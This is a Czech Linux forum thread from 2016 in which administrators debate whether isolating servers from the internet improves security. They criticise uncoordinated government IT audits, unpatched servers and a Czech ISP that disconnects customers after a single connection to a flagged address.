    Další věc, úřady celkem pravidelně dostávají emaily od CSIRTu a NCKB (apod. strašně užitečných institucí) a protože na tom úřadě tomu vůbec nikdo ani náznakem nerozumí, ale mají pocit, že to "nařízení" shora musí splnit, tak to potom pošlou na dodavatele IT řešení. Výsledkem je třeba to, že se před stávající servery dá firewall (pochopitelně cisco za půl mega) a servery se nedostanou třeba ani na repositáře pro aktualizace (protože v nějakém audity nějaký ňouma napsal, že se musí blokovat směr ven). Protože to dodavatel těch serverů (který se samozřejmě jiný, než dodavatel sítě a ten je jiný jak dodavatel VPN a tak dále), to nechce řešit (protože je to tak na půl roku a stejně mu končí smlouva), tak ty servery zůstanou rovnou bez updatů.

    Takže ve zkratce: většina bezpečnostních opatření, které jsem ve státní správě viděl, zcela neomylně vedla k narušení bezpečnosti.
    Heron
    16.6.2016 16:43 pavele
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Drobná otázka:

    Kolik těchto strojů, které byly "zabezpečeny" dle nějakého auditu, bylo napadeno?
    Heron avatar 16.6.2016 16:53 Heron | skóre: 53 | blog: root_at_heron | Olomouc
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Ta otázka nedává smysl.
    Heron
    16.6.2016 21:20 pavele
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Pokud kritizuješ nefunkční zabezpečení, je zřejmě jednoduché ty stroje napadnout. Tak se ptám znovu:

    Kolik těchto strojů, které byly "zabezpečeny" dle nějakého auditu (dle tvých slov), bylo napadeno?
    Heron avatar 16.6.2016 23:38 Heron | skóre: 53 | blog: root_at_heron | Olomouc
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Kolik těchto strojů, které byly "zabezpečeny" dle nějakého auditu (dle tvých slov), bylo napadeno?

    Nevím a je to jedno.
    Pokud kritizuješ nefunkční zabezpečení, je zřejmě jednoduché ty stroje napadnout.
    Já kritizuji stav, kdy se udělá nějaké oficiální zabezpečení a vedle toho (aby se na tom dalo vůbec pracovat a aby to vůbec běželo), se udělá díra. To, že tu díru třeba nikdo zatím nezneužil (nebo ji zneužil tak, že to nikdo nepoznal), na věci nic nemění. Je také dost dobře možné, že ta díra je zabezpečena dostatečně (alespoň po určitý čas) a tedy to oficiální, superdrahé zabezpeční je prostým plýtváním (zkrátka se to mohlo udělat rovnou technologií té díry).

    Ať tak či onak, nepovažuji za vhodné z hlediska bezpečnosti, pokud se systém navrhne nějakým způsobem (který odporuje provozu), a potom se pokoutně provozuje zcela jinak.

    Představ si, že by se tímto způsobem stavěly dálnice. Že by třeba někdo ignoroval okolní prostředí ... ehm špatný příklad ... nebo třeba stavěly mosty ... kua, zase ;-) Snad je jasné, kam tím mířím.
    Heron
    Heron avatar 16.6.2016 23:52 Heron | skóre: 53 | blog: root_at_heron | Olomouc
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    nějaké oficiální zabezpečení
    A jak jsem psal. Ono je to často dělané stylem, že NCKB pošle email, na úřadě mu vůbec nikdo nerozumí, tak to pošle na dodavatele*, ten se k tomu třeba vyjádří stylem, že je to zcela nerelevantní, úřad pošle befel, že to musí být, tak to dodavatel udělá (no, nějak). Výsledkem je chaos vzájemně nespolupracujících opatření. Takto se bezpečnost dosáhnout nedá.

    *) Pokud se ovšem vůbec trefí do toho správného. Úřady mají mnoho IT dodavatelů (sít, fw, vpn, virtualizace, hw, dodavatel webů, dodatavel intranetu apod.) a některé ani vůbec neví, která firma jim co dělá (zrovna dneska mi přišel takový hezký bug appky cizí firmy. Dřív jsem jim alespoň psal, která firma jim to dodala, ale přestal jsem s tím po zjištění, že si to ani neobtěžují zapamatovat.). Do takového prostředí pak přijde kontrola z ministerstva a vypadá to stejně jako v Monty Python's skeči (akorát v reálu, je to ještě větší sranda).
    Heron
    18.6.2016 16:00 Käyttäjä 11133 | skóre: 58 | blog: Ajattelee menneisyyttä
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Je to přesně tak. Pracoval jsem na mnoha projektech, které byly "zabezpečeny" dle nějakého auditu (což je asi tak to nejhorší, co může nastat), to znamená za devatero VPN, oddělené sítě, přístupové karty apod. Pracovat se na tom nedalo.
    vs.
    tak si ti admini vytvořili tunel přímo do těch systémů. No a dodavatelé tento tunel potom dostali taky. Takže oficiálně se dělala šaškárna s VPN kartami apod, ale reálně se jelo v podstatě přímo. Jinak by totiž ta zakázka nešla realizovat vůbec.
    Takže reálně podmínky toho auditu pravděpodobně nesplnily.
    Případně se o něj nikdo nestará, takže to zůstane v konfiguraci z roku 2007 - RSA 1024, MD5 apod. Takže další bezpečnostní hrozba.
    Takový systém by neprošel ani PCI-DSS v 3.2 auditem.
    Výsledkem je třeba to, že se před stávající servery dá firewall (pochopitelně cisco za půl mega) a servery se nedostanou třeba ani na repositáře pro aktualizace (protože v nějakém audity nějaký ňouma napsal, že se musí blokovat směr ven). Protože to dodavatel těch serverů (který se samozřejmě jiný, než dodavatel sítě a ten je jiný jak dodavatel VPN a tak dále), to nechce řešit (protože je to tak na půl roku a stejně mu končí smlouva), tak ty servery zůstanou rovnou bez updatů.
    On pravděpodobně ten auditor taky řekl, že ty systémy musí být aktualizované, takže je akorát tak chyba té organizace, že dodržela část doporučení a část ne. Mají si nasadit lokální mirror, jako to dělají každé normální security-aware organizace, stahovat aktualizace z public repository je stejně blbost, protože jak chceš třeba zajistit testování jednotlivých aktualizací? Zpravidla se aktualizace nejdřív testují a pak se pustí do produkčního prostředí.
    Heron avatar 18.6.2016 16:16 Heron | skóre: 53 | blog: root_at_heron | Olomouc
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Řekl bych, žes vůbec nepochopil o čem jsem psal (což je teda možná dobře, protože nemáš tak hrůzné zkušenosti). Tam není jeden auditor. Ten systém projde nějakým auditem (prostě proto, že potřebují papír na cosi). Za rok přijde další audit, který s tím předchozím vůbec nepolupracuje a třeba řeší něco jiného. Potom přijde befel od NKCB, který doporučuje zase něco jiného. Je to hromada často protichůdných věcí.
    takže je akorát tak chyba té organizace
    Ano, říkal jsem, že tomu na těch úřadech vůbec nikdo nerozumí. (Až na výjimky, jsou ministerstva, se kterými se pracuje dobře a na IT jsou skuteční admini.)
    Mají si nasadit lokální mirror, jako to dělají každé normální security-aware organizace, stahovat aktualizace z public repository je stejně blbost, protože jak chceš třeba zajistit testování jednotlivých aktualizací?
    Jo, což by dopadlo přesně tak, že nějaká firma by nasadila lokální mirror (a zakázka je hotova), tento mirror by se stejně nikam nenastavil (protože firma nasazující tento mirror nemá oprávnění ani možnosti zasahovat do serverů), a potom by stejně přišel befel blokujte odchozí provoz a ani servery tohoto mirorru by se nedostaly na repa.
    Heron
    19.6.2016 23:57 Käyttäjä 11133 | skóre: 58 | blog: Ajattelee menneisyyttä
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    tento mirror by se stejně nikam nenastavil (protože firma nasazující tento mirror nemá oprávnění ani možnosti zasahovat do serverů),
    Tak když si někdo neumí udělat specifikaci vlastního IT prostředí... :-) Jako třeba že každý server toho a toho typu musí být nastaven tak a tak - třeba CIS hardening,... tak se nedivím, že vám ty audity neprocházejí :D
    Heron avatar 20.6.2016 09:50 Heron | skóre: 53 | blog: root_at_heron | Olomouc
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Nám ne. Jak jsem psal, mě už přestalo bavit jim i sdělovat, která firma se o tento jejich požadavek postará (vysílají je náhodně, protože neví, co kdo dělá). Já už se tím jenom bavím.
    Heron
    Jendа avatar 21.6.2016 02:17 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    na všechno ostatní se zapomíná - třeba na ty VPNky
    Tohle mě fascinuje. Debian Jessie měl po vydání v Dovecotu defaultně RC4-40 a MD5 a openvpn snad dosud generuje 1024b RSA klíče (minimálně na Wheezym ještě generovala).
    Další věc, úřady celkem pravidelně dostávají emaily od CSIRTu a NCKB (apod. strašně užitečných institucí) a protože na tom úřadě tomu vůbec nikdo ani náznakem nerozumí
    Dopis od NCKB. Taky mi chvíli trvalo, než jsem pochopil, co se mi vlastně snaží sdělit.
    Protože to dodavatel těch serverů (který se samozřejmě jiný, než dodavatel sítě a ten je jiný jak dodavatel VPN a tak dále), to nechce řešit (protože je to tak na půl roku a stejně mu končí smlouva), tak ty servery zůstanou rovnou bez updatů.
    Pak potkávám ještě jeden scénář: dodavatel nainstaluje CentOS/Debian se svojí aplikací, nikomu nic neřekne a odejde. Distribuci skončí podpora a nikdo to nedokáže aktualizovat, aby se to nerozsypalo.
    21.6.2016 08:04 Käyttäjä 11133 | skóre: 58 | blog: Ajattelee menneisyyttä
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Pak potkávám ještě jeden scénář: dodavatel nainstaluje CentOS/Debian se svojí aplikací, nikomu nic neřekne a odejde. Distribuci skončí podpora a nikdo to nedokáže aktualizovat, aby se to nerozsypalo.
    A pak přišel Docker...
    Jendа avatar 21.6.2016 13:04 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    To neřeší, že uvnitř toho kontejneru pořád bude Bash se shellshockem, openssl z roku 1972 a glibc s getaddrinfo s RCE.
    Acci avatar 23.6.2016 17:24 Acci | skóre: 3 | blog: Jen na chvíli…
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    To by mě zajímalo. Proč ti ten „dopis” došel?
    Jendа avatar 23.6.2016 19:07 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Provozuju Tor exit a někdo se z něj pokusil připojit na tu adresu.

    Pak mi přišlo od UPC podstatně drsněji napsané, že mě odpojují, protože šířím malware. Zjistil jsem, že to je za TCP spojení na tu adresu.

    Schválně kdo máte UPC si zkuste kliknout, jestli vás do pár dní odpojí. Možná už to opravili.
    pavlix avatar 23.6.2016 23:28 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    A ještě ho provozuješ? :)
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    Jendа avatar 24.6.2016 07:45 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    U Forpsi ne, protože dva abuse maily za měsíc mě nebavily. U OVH jo, tam jsem měl zatím jeden abuse za rok (za zkoušení hesel na SSH). Pak ještě brmlab provozuje jeden u Trusticy a tam zatím nebyl problém žádný. Viz tady a family.

    Mnohem zábavnější je, že to odpojení od UPC šlo udělat třeba tak, že člověk vložil do stránky obrázek s tou adresou, protože jim opravdu stačí, že na tu adresu pošleš GET / HTTP request. Chvíli jsem přemýšlel, jestli to dát na jednu populární obrázkovou službu, a odpojit tak část ČR od internetu, ale pak jsem si řekl, že nebudu hajzl. Mrkva to pak řešil se supportem (kliknul na můj odkaz a taky ho to odpojilo) a slíbili mu, že to postoupí dál. Já jsem se ten problém snažil supportu popsat, ale ten operátor nevěděl, co je to TCP, takže se to nepodařilo.
    24.6.2016 18:31 petr_p | skóre: 59 | blog: pb
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost

    Je to tak. Vyzkoušel jsem si taky jediný požadavek. Až druhý den kolem 10. hodiny zablokovaly TCP porty pro SSH, IMAPS, IPv6 nad IPv4 a kdoví co ještě. Oběma směry. Tak jsem jim tam zavolal, UPC problém identifikovalo jako „malware“ a trvali na tom, abych pročistil systém. Na to jsem chtěl podrobnosti, ať vím, co hledat, to ale nebyli ochotni sdělit. Tak jsem poměrně nesrozumitelně nadhodil on IP adresu a operátor se chytil a řekl, že tam má uveden pokus o spojení na její port 80. Trochu jsem si postěžoval, že by příště by mohli informovat e-mailem o zablokování (nic mi nepřišlo) a na blokovaný provoz by mohli reagovat ICMP zprávami namísto tichého zahazování. Operátor mě ujistil, že se mým zlepšovákem budou zabývat. Je fakt smutné, že jediný SYN packet může odpojit zákazníka.

    25.6.2016 00:51 trekker.dk | skóre: 72
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Operátor mě ujistil, že se mým zlepšovákem budou zabývat.
    Překlad: jdi do prdele a polož už konečně ten telefon.
    Quando omni flunkus moritati
    Acci avatar 24.6.2016 10:18 Acci | skóre: 3 | blog: Jen na chvíli…
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Aha a to ti přišlo přímo tobě na e-mail?
    Jendа avatar 24.6.2016 10:22 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Přeposlal mi to support Forpsi, protože to asi přišlo na jejich abuse kontakt.
    Acci avatar 24.6.2016 13:58 Acci | skóre: 3 | blog: Jen na chvíli…
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Tak to je chyba Forpsi, že ti ten e-mail poslali, není určen pro koncové uživatele.
    Jendа avatar 24.6.2016 15:37 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    A co by s ním měli dělat? Mně přijde normální že když přijde mail na abuse, tak se přepošle správci přípojky/koncového stroje.
    Jendа avatar 24.6.2016 10:23 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    A to UPC přišlo přímo na e-mail, který je uvedený ve smlouvě s nima.
    16.6.2016 19:22 Prohnutá nudle
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Pokud se staraji jini admini o serevry a jiny o proxy, tak to muze fungovat i jako jedna z ochranan pred zaskodnicenim z vnitrku firmy.

    Dalsi vec je, pokud na server protlacim svuj kod a ten pustim, tak nebude mozne stahovat neco jen tak z internetu, jinymi slovy utocnikovi seberu jeden smer jeho komunikacniho kanalu, cimz mu taky trochu zneprijemnim zivot.

    Lepsich ci blbsich veci se da vymyslet spousta...

    Nebo se da na to koukat takhle: potrbuje ten server k tomu aby delal co ma neco stahovat z internetu? Pokud ne, tak nespravuj co neni rozbite a nedavej mu tu moznost. Potrebuje admin stahovat neco na ten server z internetu? Pak mas rozbitou infrastrukturu...
    16.6.2016 19:42 Filip Jirsák | skóre: 67 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Ona nemusí přístup do internetu potřebovat přímo business aplikace, ale může ho vyžadovat infrastruktura aplikace – třeba kvůli ověřování certifikátů přes OCSP nebo CRL.
    17.6.2016 00:38 prohnuta nudle
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    To je pravda, pak muze prijit na radu kompromis v podobe proxy, skrz ktery muzu ridit co kdy a kam muze.
    18.6.2016 16:03 Käyttäjä 11133 | skóre: 58 | blog: Ajattelee menneisyyttä
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    V takovýchto prostředích se zpravidla používá vlastní ePKI, takže se CLR / OCSP nasazuje v té příslušné síti.
    Jendа avatar 21.6.2016 02:07 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Pokud se neprovozují nějaké ne příliš bezpečné aplikace, tak je podle mě celkem pravděpodobná možnost kompromitace tím, že někdo vyhackuje adminův desktop, ze kterého se SSHčkuje. A tohle proti tomu nepomůže. Takže si myslím, že by líp udělali, kdyby navíc byla třeba nějaká dedikovaná admin stanice. (samozřejmě ne vždy to lze, záleží na use-case)

    Založit nové vláknoNahoru

    Píšeme jinde
    ISSN 1214-1267   www.czech-server.cz
    Redakce | Inzerce | Podmínky použití | Osobní údaje
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.